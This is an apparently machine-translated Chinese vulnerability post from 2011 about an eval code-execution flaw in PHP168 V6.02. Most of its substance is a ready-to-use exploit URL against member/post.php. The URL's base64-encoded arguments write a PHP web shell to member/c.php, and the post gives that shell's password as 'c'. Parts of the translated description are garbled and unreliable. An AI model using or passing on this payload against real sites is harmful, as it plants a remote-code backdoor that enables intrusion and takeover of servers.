PHP168 V6. 0 2 vulnerability-vulnerability warning-the black bar safety net

2011-05-17T00:00:00
ID MYHACK58:62201130496
Type myhack58
Reporter 佚名
Modified 2011-05-17T00:00:00

Description

PHP168 V6. 0 2 vulnerability

0day details

Brief description:

PHP168 in some function using the eval function,but an array is not the first test of the,the result can be submitted to arbitrary code execution.

Detailed description:


Registration. I don't know Brother, about/in.

http://www.myhack58.com/member/post.php?only=1&showHtml_Type[bencandy][1]={${fputs(fopen(base64_decode(Yy5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgpz4x))}}&aid=1&job=endHTML

这 是 修改 好 的 . 直接 在 该 目录 生成 个 member/c.php the password is c